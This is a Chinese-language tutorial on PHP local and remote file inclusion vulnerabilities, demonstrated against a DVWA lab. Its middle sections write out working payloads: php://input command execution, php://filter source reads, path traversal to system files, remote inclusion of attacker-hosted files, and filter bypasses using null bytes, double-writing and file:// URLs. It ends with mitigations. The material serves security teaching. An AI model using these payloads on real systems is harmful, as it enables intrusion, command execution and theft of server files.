漏洞原理：程序员开发web应用程序的时候，未对用户可控的包含文件进行严格过滤，导致攻击者可构造自己木马文件被包含，从而执行恶意代码。漏洞关键：包含的文件用户可控

    文件包含：开发语言为了更好地使用代码的重用性，引入了文件包含函数，可以通过文件包含函数将文件包含进来，直接使用包含文件的代码。

    产生漏洞的原因：在包含文件时候，为了灵活包含文件，将被包含文件设置为变量，通过动态变量来引入需要包含的文件时，用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过，这样就导致了文件包含漏洞

    php文件包含函数：include( )，include_once( )，require( )，require_once( )。其中include( )，include_once( )当遇到被包含文件的代码执行错误时，会给出一个警告，并继续执行下面的代码。require( )，require_once( )当遇到被包含文件的代码执行错误时函数会输出错误信息，并终止脚本的运行

漏洞分类：

    文件包含支持的协议：

        data:text/plain 或 data:text/plain;base64

        php://input

        php://filter

        file://

        zip://

    本地文件包含漏洞：当被包含的文件在服务器本地时，就形成了本地文件包含

    远程文件包含漏洞：当被包含的文件在远程服务器上时，就形成了远程文件包含

        远程文件包含需要开启allow_url_include=on 以及allow_url_fopen=on和关闭 magic_quotes_gpc=off

        所包含远程服务器的文件后缀不能与目标服务器语言相同。(比如目标服务器是php脚本语言解析的，那么包含的远程服务器文件后缀不能是php)

常用挖掘方法：

    1. 查看源代码寻找include(),include_once(),require()和require_once()函数。

    2.在URL的查询参数中寻找类似?page=a.php ， ?home=b.html ，?file=content… 的地方。

常用攻击：

      一个要点：文件包含可以包含任意文件，即便被包含的文件与当前编程语言无关，甚至为图片，只要文件被包含，其符合当前脚本语言语法的内容都会执行，不符合当前脚本语言语法的，会直接将文件内容输出

    1. 文件遍历读取，从而读取系统的敏感信息

    2. 上传带有木马的文件如图片，然后包含木马文件getshell

    3. 通过php协议包含输入命令，从而执行php命令

    4.包含日志文件

典型攻击：

    后台的典型代码：

       <?php

    $filename  = $_GET['filename'];

    include($filename);

    ?>

    典型攻击URL：

   构造URL： http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://filter/read=convert.base64-encode/resource=x.php

     构造URL： http://192.168.1.55:8080/dvwa/vulnerabilities/fi/?page=php://input,并且提交post数据为:<?php system('net user');?>

防御&绕过：

    1. 限制本地包含文件只能是php文件

    绕过方法1：%00 截断

　　条件：magic_quotes_gpc = Off PHP 版本<5.3.4

　　测试：？filename=../../../../../../boot.ini%00

    绕过方法2：路径长度截断

　　条件：windows下目录路径最大长度为256字节，超出部分将丢弃；

 　　　　  Linux下目录最大长度为4096字节，超出长度将丢弃

　　测试：?filename=text.txt././././.  或?filename=test.txt.....

    2. 远程文件包含防御与绕过：

当服务器的php.ini的配置选项allow_url_fopen和allow_url_include为On，则include/require函数式可加载远程文件的。

    2.1有限制远程包含绕过

　测试代码：<?php include($_GET['filename'].".html");?>  多添加了html后缀，到最后远程包含的文件　一会多一个HTML后缀

问号绕过

　　测试：？filename=http://192.168.91.133/FI/php.txt?

#号绕过

　　测试：?filenamr=http://192.168.91.133/FI/php.txt%23

可通过%00截断绕过

　　测试：?filename=http://192.168.91.133/FI/php.txt%00

3.str_replace函数绕过：

使用str_replace函数是极其不安全的，因为可以使用双写绕过替换规则。

例如：page=hthttp://tp://192.168.0.103/phpinfo.txt时，str_replace函数会将http://删除，于是page=http://192.168.0.103/phpinfo.txt，成功执行远程命令。

远程文件包含：http://192.168.0.103/dvwa/vulnerabilities/fi/page=htthttp://p://192.168.5.12/phpinfo.txt

本地文件包含：http://192.168.0.103/dvwa/vulnerabilities/fi/page=..././..././..././..././..././xampp/htdocs/dvwa/php.ini

4.因为替换的只是“../”、“..\”，所以对采用绝对路径的方式包含文件是不会受到任何限制的。

    绝对路径不受任何影响

http://192.168.0.103/dvwa/vulnerabilities/fi/page=C:/xampp/htdocs/dvwa/php.ini

5. fnmatch函数绕过：

if(!fnmatch("file*",$file)&&$file!="include.php"),当文件既不是"include.php"也不是"file*"（文件名file开头）时才抛出错误，反之意思，如果文件名符合其中一个条件既可以。

构造URL：http://192.168.0.103/dvwa/vulnerabilities/fi/page=file:///C:/xampp/htdocs/dvwa/php.ini

page=file:///C:/xampp/htdocs/dvwa/php.ini 刚好满足"file*"（文件名file开头）所以成功读取了服务器的配置文件。

修复方法：

    PHP中可使用open_basedir配置限制访问限制在指定的区域

    过滤.(点)/(反斜杠)\(斜杠)

    禁止服务器远程文件包含

好的参考：//www.greatytc.com/p/3514f0fd79f7